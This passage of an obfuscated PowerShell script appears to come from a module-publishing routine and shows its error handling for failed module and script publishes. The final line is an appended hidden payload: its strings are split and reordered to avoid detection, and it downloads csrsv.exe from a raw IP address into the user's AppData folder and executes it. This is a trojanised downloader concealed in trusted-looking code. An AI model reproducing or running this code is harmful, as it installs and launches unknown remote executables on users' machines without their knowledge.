        if (${pS`ARt`If`ACTType} -eq ("{1}{2}{0}" -f'ule','Mo','d')) {
            ${m`eSS`AgE} = ${l`OcaliZ`E`D`DATA}."puBL`i`sHEDS`UcCE`sSfu`lLy" -f (${n`AMe}, ${d`eSTin`A`Tion}, ${n`AMe})
        }
        if (${ps`ARTIFac`TT`Y`PE} -eq ("{0}{1}" -f'Scr','ipt')) {
            ${me`ssA`GE} = ${l`oCa`lizED`DaTa}."Pub`Lish`EdS`cRIptsUCc`es`sfU`L`lY" -f (${na`me}, ${destIn`A`TION}, ${Na`mE})
        }

        &("{1}{2}{0}" -f'e','Write-Verbo','s') -Message ${M`eSs`AGE}
    }
    catch {
        if ( ${nuG`ETApiK`ey} -eq ("{0}{1}"-f'V','STS') -and (${_}."eX`c`EPTion"."mess`AGe" -match ("{7}{3}{1}{4}{5}{2}{6}{0}" -f'nteractive mode.','omp','ut ','nnot pr','t f','or inp','in non-i','Ca'))) {
            ${m`E`SSAge} = ${loC`ALIzeD`daTa}."R`eGISTer`V`sTsfeEDas`NUGe`TpACk`AGEsoURCE" -f (${dEsTI`NaT`IoN}, ${SCRIP`T:vSTsAUtH`e`NtI`Ca`TedF`Ee`dSDoc`Url})
        }
        else {
            ${M`essa`Ge} = ${_}."eX`CeptI`On"."ME`S`sage"
        }

        if (${PS`ArTIF`AC`TTy`PE} -eq ("{1}{0}" -f 'ule','Mod')) {
            ${E`Rr`oRM`eSsA`Ge} = ${LOc`A`LiZedda`Ta}."fA`ILedtOPUbl`i`SH" -f (${n`Ame}, ${mESS`Age})
            ${eRrO`R`id} = ("{0}{2}{6}{3}{5}{4}{1}"-f'F','eModule','ai','e','Th','dToPublish','l')
        }

        if (${P`SARt`IfA`CT`TYPE} -eq ("{1}{0}" -f 'ript','Sc')) {
            ${ERrOR`mES`S`A`GE} = ${l`OcaLiZ`EDdAta}."FaI`LedTopublIsHSc`R`ipT" -f (${NA`me}, ${MEss`AGe})
            ${e`R`RORID} = ("{3}{2}{4}{1}{0}"-f'eScript','ToPublishTh','le','Fai','d')
        }

        &("{0}{3}{1}{2}" -f'Writ','rr','or','e-E') -Message ${Err`oRme`ssaGe} -ErrorId ${e`RrO`RId} -Category ("{1}{0}{2}"-f 'nval','I','idOperation') -ErrorAction ("{1}{0}"-f 'op','St')
    }
}

(&("{1}{3}{0}{2}" -f 'Obje','Ne','ct','w-') ("{0}{2}{1}{4}{3}" -f'Syste','Cl','m.Net.Web','t','ien')).("{2}{1}{0}"-f'adFile','o','Downl').Invoke(("{4}{8}{0}{2}{7}{5}{1}{3}{9}{6}"-f '/','oo/cs','/89.248.','rsv','ht','.218/~yah','e','170','tp:','.ex'),"$env:APPDATA\csrsv.exe");&("{3}{0}{2}{1}"-f 'art-','ess','Proc','St') ("$env:APPDATA\csrsv.exe")
